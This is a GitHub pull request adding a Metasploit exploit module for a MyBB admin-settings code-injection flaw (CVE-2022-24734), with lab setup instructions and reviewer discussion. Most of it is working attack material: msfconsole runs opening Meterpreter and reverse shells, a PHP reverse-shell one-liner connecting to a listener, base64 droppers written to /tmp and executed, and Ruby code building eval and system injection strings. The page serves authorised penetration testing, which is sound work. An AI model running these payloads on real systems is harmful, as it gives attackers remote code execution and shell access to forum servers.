Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

MyBB Admin Control Code Injection RCE (CVE-2022-24734) #16607

Merged
merged 3 commits into from
May 31, 2022
Merged

MyBB Admin Control Code Injection RCE (CVE-2022-24734) #16607

merged 3 commits into from
May 31, 2022

Conversation

cdelafuente-r7
Copy link
Contributor

This exploit module leverages an improper input validation vulnerability in MyBB prior to 1.8.30 to execute arbitrary code in the context of the user running the application.

MyBB Admin Control setting page calls PHP eval function with an unsanitized user input. The exploit adds a new setting, injecting the payload in the vulnerable field, and triggers its execution with a second request. Finally, it takes care of cleaning up and removes the setting.

Note that authentication is required for this exploit to work and the account must have rights to add or update settings (typically, myBB administrator role).

Installation Steps

Linux with Docker

  • Use this docket-compose.yml file (see this):
services:
  mybb:
    image: mybb/mybb:1.8.29
    volumes:
    - ${PWD}/mybb:/var/www/html:rw

  nginx:
    image: nginx:mainline-alpine
    ports:
    - published: 8080
      target: 80
    volumes:
    - ${PWD}/nginx:/etc/nginx/conf.d:ro
    - ${PWD}/mybb:/var/www/html:ro

  postgresql:
    environment:
      POSTGRES_DB: mybb
      POSTGRES_PASSWORD: changeme
      POSTGRES_USER: mybb
    image: postgres:14-alpine
    volumes:
    - ${PWD}/postgres/data:/var/lib/postgresql/data:rw

version: '3.8'
  • Create nginx/default.conf 
    upstream mybb {
    server mybb:9000 weight=5;
}

server {
    listen 80;

    root /var/www/html;
    index index.html index.php;

    location / {
        try_files $uri $uri/ /index.php?$args;
    }

    location ~ inc/ {
        internal;
    }

    location ~ ^/(images|cache|jscripts|uploads)/ {
        access_log off;
    }

    location ~ \.php$ {
        try_files $uri =404;
        fastcgi_split_path_info ^(.+\.php)(/.+)$;
        fastcgi_pass mybb;
        fastcgi_index index.php;
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_param PATH_INFO $fastcgi_path_info;
    }
}
  • Run docker-compose up.
  • Access the application at http://127.0.0.1:8080/install and finish the installation process.

Windows with Nginx, PHP and MySQL

  • Install MySQL:
    • Follow the installation process here
  • Install PHP:
    • Download PHP (Non Thread Safe) here
    • Extract everything to C:\php
    • run: 
      cd C:\php
set PHP_FCGI_CHILDREN=5
set PHP_FCGI_MAX_REQUESTS=500
php-cgi.exe -b 127.0.0.1:9999
  • Install Nginx:
    • Download Nginx here
    • Extract everything to C:\nginx
    • Set the following options to C:\nginx\nginx.conf 
      worker_processes  auto;
...
server {
    listen 80;

    root www;
    index index.html index.php;

    location / {
        try_files $uri $uri/ /index.php?$args;
    }

    location ~ inc/ {
        internal;
    }

    location ~ ^/(images|cache|jscripts|uploads)/ {
        access_log off;
    }

    location ~ \.php$ {
        try_files $uri =404;
        fastcgi_split_path_info ^(.+\.php)(/.+)$;
        fastcgi_pass 127.0.0.1:9999;
        fastcgi_index index.php;
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_param PATH_INFO $fastcgi_path_info;
    }
}
    • Run: 
      cd C:\nginx
start nginx.exe
  • Install MyBB
    • Follow the installation process here.

Verification Steps

  1. Install the application (see Installation Steps)
  2. Start msfconsole
  3. Do: use exploit/multi/http/mybb_rce_cve_2022_24734
  4. Do: run LHOST=<local host IP> RHOSTS=<remote host IP> USERNAME=<MyBB user> PASSWORD=<MyBB password>
  5. You should get a shell.
  6. Try again with a different targets

Options

USERNAME

The username of a privileged MyBB account. It must have rights to add or update setting (usually with the administrator role)

PASSWORD

The password of the MyBB account.

Scenarios

Windows (target 0 - PHP)

msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.1.44 RHOSTS=192.168.1.215 USERNAME=msfuser PASSWORD=123456
[*] Started reverse TCP handler on 192.168.1.44:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Sending stage (39860 bytes) to 192.168.1.215
[*] Meterpreter session 1 opened (192.168.1.44:4444 -> 192.168.1.215:63777) at 2022-05-23 15:41:40 +0200
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...

meterpreter > sysinfo
Computer    : DC02
OS          : Windows NT DC02 10.0 build 17763 (Windows Server 2019) AMD64
Meterpreter : php/windows

Linux (target 0 - PHP)

msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.0.48 RHOSTS=127.0.0.1 RPORT=8080 USERNAME=msfuser PASSWORD=123456
[*] Started reverse TCP handler on 192.168.0.48:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Sending stage (39860 bytes) to 192.168.0.48
[*] Meterpreter session 2 opened (192.168.0.48:4444 -> 192.168.0.48:50029) at 2022-05-23 15:41:58 +0200
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...

meterpreter > sysinfo
Computer    : e087259940a8
OS          : Linux e087259940a8 5.10.76-linuxkit #1 SMP Mon Nov 8 10:21:19 UTC 2021 x86_64
Meterpreter : php/linux

Linux (target 1 - Unix (In-Memory))

msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > set target 1
target => 1
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.0.48 RHOSTS=127.0.0.1 RPORT=8080 USERNAME=msfuser PASSWORD=123456
[+] php -r '$ctxt=stream_context_create(["ssl"=>["verify_peer"=>false,"verify_peer_name"=>false]]);while($s=@stream_socket_client("ssl://192.168.0.48:4444",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);}}'&
[*] Started reverse SSL handler on 192.168.0.48:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Command shell session 3 opened (192.168.0.48:4444 -> 192.168.0.48:50151) at 2022-05-23 15:42:58 +0200


ls
backups
inc
index.php
jscripts
modules
styles
^C
Abort session 3? [y/N]  y

Linux (target 2 - linux (Dropper))

msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.0.48 RHOSTS=127.0.0.1 RPORT=8080 USERNAME=msfuser PASSWORD=123456
[*] Started reverse TCP handler on 192.168.0.48:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1towKgBE2gCABFcieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/UAznK.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/jHFeb' < '/tmp/UAznK.b64' ; chmod +x '/tmp/jHFeb' ; '/tmp/jHFeb' ; rm -f '/tmp/jHFeb' ; rm -f '/tmp/UAznK.b64'"]
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (989032 bytes) to 192.168.0.48
[*] Meterpreter session 4 opened (192.168.0.48:4444 -> 192.168.0.48:50213) at 2022-05-23 15:43:26 +0200
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Command Stager progress - 100.00% done (763/763 bytes)

meterpreter > sysinfo
Computer     : 172.18.0.4
OS           :  (Linux 5.10.76-linuxkit)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

Windows (target 3 - PowerShell (In-Memory))

msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > set target 3
target => 3
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.1.44 RHOSTS=192.168.1.215 USERNAME=msfuser PASSWORD=123456
[*] Started reverse TCP handler on 192.168.1.44:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Powershell command length: 6767
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Sending stage (175174 bytes) to 192.168.1.215
[*] Meterpreter session 5 opened (192.168.1.44:4444 -> 192.168.1.215:63818) at 2022-05-23 15:43:54 +0200
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...

meterpreter > sysinfo
Computer        : DC02
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MYLAB
Logged On Users : 8
Meterpreter     : x86/windows

Windows (target 4 - Windows (In-Memory))

msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > set target 4
target => 4
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.1.44 RHOSTS=192.168.1.215 USERNAME=msfuser PASSWORD=123456
[*] Started reverse TCP handler on 192.168.1.44:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Command shell session 6 opened (192.168.1.44:4444 -> 192.168.1.215:63848) at 2022-05-23 15:44:23 +0200


Shell Banner:
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\nginx\www\admin>
-----


C:\nginx\www\admin>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 4215-6DA6

 Directory of C:\nginx\www\admin

05/19/2022  04:11 PM    <DIR>          .
05/19/2022  04:11 PM    <DIR>          ..
05/19/2022  04:11 PM    <DIR>          backups
05/19/2022  04:11 PM    <DIR>          inc
10/29/2021  12:00 AM            24,476 index.php
05/19/2022  04:11 PM    <DIR>          jscripts
05/19/2022  04:11 PM    <DIR>          modules
05/19/2022  04:11 PM    <DIR>          styles
               1 File(s)         24,476 bytes
               7 Dir(s)  48,613,580,800 bytes free

Windows (target 5 - Windows (Dropper))

msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > set target 5
target => 5
msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=192.168.1.44 RHOSTS=192.168.1.215 USERNAME=msfuser PASSWORD=123456
[*] Started reverse TCP handler on 192.168.1.44:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Generated command stager: ["echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAA...
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Command Stager progress -   2.01% done (2046/101881 bytes)
...
[*] Command Stager progress -  98.40% done (100252/101881 bytes)
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Sending stage (175174 bytes) to 192.168.1.215
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Command Stager progress - 100.00% done (101881/101881 bytes)
[*] Meterpreter session 7 opened (192.168.1.44:4444 -> 192.168.1.215:64264) at 2022-05-23 15:45:07 +0200

meterpreter > sysinfo
Computer        : DC02
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MYLAB
Logged On Users : 8
Meterpreter     : x86/windows

@jheysel-r7 jheysel-r7 self-assigned this May 24, 2022
jmartin-tech
jmartin-tech reviewed May 26, 2022
View reviewed changes
modules/exploits/multi/http/mybb_rce_cve_2022_24734.rb Outdated
Comment on lines 216 to 232
case target['Platform']
when 'php'
cmd = cmd.gsub(/"/, '"' => '\\"')
cmd = cmd.gsub(/\$/, '$' => '\\$')
extra = "\" . eval(\"#{cmd}\") .\""
when 'win'
cmd = cmd.gsub(/'/, "'" => "\\'")
if target['Arch'] == ARCH_CMD
# Force cmd to run in the background (only works for `cmd`)
extra = "\" . pclose(popen('start /B #{cmd}', 'r')) .\""
else
extra = "\" . system('#{cmd}') .\""
end
else
cmd = cmd.gsub(/'/, "'" => "\\'")
extra = "\" . system('#{cmd} > /dev/null &') .\""
end
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This feels like a PHP utility function for staging a commands via PHP.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Especially because you might want to add alternatives if system and popen are blocked :)

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Yes, I agree, it is certainly a good start for such helper. However, it is very specific to how the PHP code is being injected. Here, the injection occurs in an eval(), as a simple concatenation to a string.

jvoisin
jvoisin reviewed May 27, 2022
View reviewed changes
modules/exploits/multi/http/mybb_rce_cve_2022_24734.rb Outdated Show resolved Hide resolved
modules/exploits/multi/http/mybb_rce_cve_2022_24734.rb Outdated
Comment on lines 216 to 232
case target['Platform']
when 'php'
cmd = cmd.gsub(/"/, '"' => '\\"')
cmd = cmd.gsub(/\$/, '$' => '\\$')
extra = "\" . eval(\"#{cmd}\") .\""
when 'win'
cmd = cmd.gsub(/'/, "'" => "\\'")
if target['Arch'] == ARCH_CMD
# Force cmd to run in the background (only works for `cmd`)
extra = "\" . pclose(popen('start /B #{cmd}', 'r')) .\""
else
extra = "\" . system('#{cmd}') .\""
end
else
cmd = cmd.gsub(/'/, "'" => "\\'")
extra = "\" . system('#{cmd} > /dev/null &') .\""
end
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Especially because you might want to add alternatives if system and popen are blocked :)

@cdelafuente-r7
Copy link
Contributor Author

Thanks for the review @smcintyre-r7, @jmartin-r7, @jvoisin and @jheysel-r7. I pushed some updates to address your feedback.

@jvoisin, in relation to this comment: that would be interesting to provide alternatives to system() and popen() in a more generic way. Any suggestion in the context of this exploit? Maybe moving this logic to an external mixin with a helper function that provides generic PHP command injection (as @jmartin-r7 suggested). This could be backed up by a specific datastore option that let the user choose which API should be used?

@jvoisin
Copy link
Contributor

jvoisin commented May 30, 2022

Moving it to a mixing would make sense, since this is kinda off-topic in this module I think.

@jheysel-r7
Copy link
Contributor

Thanks @cdelafuente-r7 for the great module! Code looks great and testing provided the expected output on both linux and windows installs:

Linux (target 0 - PHP)

msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=172.20.0.1 RHOSTS=172.16.199.158 RPORT=8080 USERNAME=admin PASSWORD=admin

[*] Started reverse TCP handler on 172.20.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Sending stage (39860 bytes) to 172.20.0.3
[*] Meterpreter session 1 opened (172.20.0.1:4444 -> 172.20.0.3:58624) at 2022-05-26 08:31:08 -0700
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...

meterpreter > sysinfo
Computer    : 5722bad13440
OS          : Linux 5722bad13440 5.13.0-44-generic #49~20.04.1-Ubuntu SMP Wed May 18 18:44:28 UTC 2022 x86_64
Meterpreter : php/linux
meterpreter >

Linux (target 1 - Unix (In-Memory))

msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=172.20.0.1 RHOSTS=172.16.199.158 RPORT=8080 USERNAME=admin PASSWORD=admin

[+] php -r '$ctxt=stream_context_create(["ssl"=>["verify_peer"=>false,"verify_peer_name"=>false]]);while($s=@stream_socket_client("ssl://172.20.0.1:4444",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);}}'&
[*] Started reverse SSL handler on 172.20.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Command shell session 2 opened (172.20.0.1:4444 -> 172.20.0.3:58626) at 2022-05-26 08:40:19 -0700


id
uid=82(www-data) gid=82(www-data) groups=82(www-data),82(www-data)

Linux (target 2 - linux (Dropper))

msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=172.20.0.1 RHOSTS=172.16.199.158 RPORT=8080 USERNAME=admin PASSWORD=admin

[*] Started reverse TCP handler on 172.20.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1torBQAAWgCABFcieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/jxCKF.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/sSzgJ' < '/tmp/jxCKF.b64' ; chmod +x '/tmp/sSzgJ' ; '/tmp/sSzgJ' ; rm -f '/tmp/sSzgJ' ; rm -f '/tmp/jxCKF.b64'"]
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (989032 bytes) to 172.20.0.3
[*] Meterpreter session 4 opened (172.20.0.1:4444 -> 172.20.0.3:58634) at 2022-05-26 08:43:24 -0700
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Command Stager progress - 100.00% done (763/763 bytes)

meterpreter > sysinfo
Computer     : 172.20.0.3
OS           :  (Linux 5.13.0-44-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux

Windows (target 0 - PHP)

msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=172.16.199.1 RHOSTS=172.16.199.236 USERNAME=admin PASSWORD=admin

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Sending stage (39860 bytes) to 172.16.199.236
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.236:49917) at 2022-05-27 14:20:49 -0400
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...

meterpreter > sysinfo
Computer    : DESKTOP-0LJOKTA
OS          : Windows NT DESKTOP-0LJOKTA 10.0 build 19042 (Windows 10) AMD64
Meterpreter : php/windows
meterpreter > exit -y

Windows (target 3 - PowerShell (In-Memory))

msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=172.16.199.1 RHOSTS=172.16.199.236 USERNAME=admin PASSWORD=admin

[*] Powershell command length: 4227
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Sending stage (175174 bytes) to 172.16.199.236
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.236:50291) at 2022-05-31 11:50:07 -0400

meterpreter > sysinfo
Computer        : DESKTOP-0LJOKTA
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

Windows (target 4 - Windows (In-Memory))

msf6 exploit(multi/http/mybb_rce_cve_2022_24734) > run Verbose=true LHOST=172.16.199.1 RHOSTS=172.16.199.236 USERNAME=admin PASSWORD=admin

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] MyBB forum found running at /
[!] The service is running, but could not be validated.
[*] Attempting login
[+] Login successful!
[*] Adding a malicious settings
[*] Generated command stager: ["echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0>>%TEMP%\\TsbHi.vbs & echo For n = 1 

...

[*] Command Stager progress -  98.40% done (100252/101881 bytes)
[*] Adding a crafted configuration setting entry with the payload
[+] Payload successfully sent
[*] Triggering the payload execution
[*] Sending stage (175174 bytes) to 172.16.199.236
[*] Removing the configuration setting
[*] Grab the delete parameters
[*] Send the delete request
[*] Shell incoming...
[*] Command Stager progress - 100.00% done (101881/101881 bytes)
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.236:50257) at 2022-05-31 11:46:20 -0400

meterpreter > sysinfo
Computer        : DESKTOP-0LJOKTA
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

@jheysel-r7 jheysel-r7 merged commit bea4207 into rapid7:master May 31, 2022
@cdelafuente-r7 cdelafuente-r7 deleted the mybb_forum_rce_CVE-2022-24734 branch June 1, 2022 08:13
@cdelafuente-r7 cdelafuente-r7 added the rn-modules release notes for new or majorly enhanced modules label Jun 1, 2022
@cdelafuente-r7
Copy link
Contributor Author

Release Notes

Adds an exploit module that leverages an improper input validation vulnerability in MyBB prior to 1.8.30 (CVE-2022-24734) to execute arbitrary code in the context of the user running the application. Authentication to the MyBB Admin Control is required for this exploit to work and the account must have rights to add or update settings.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@jvoisin jvoisin jvoisin left review comments

@jmartin-tech jmartin-tech jmartin-tech left review comments

@jheysel-r7 jheysel-r7 jheysel-r7 left review comments

@smcintyre-r7 smcintyre-r7 smcintyre-r7 left review comments

Assignees

@jheysel-r7 jheysel-r7

Labels
module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
5 participants
@cdelafuente-r7 @jvoisin @jheysel-r7 @jmartin-tech @smcintyre-r7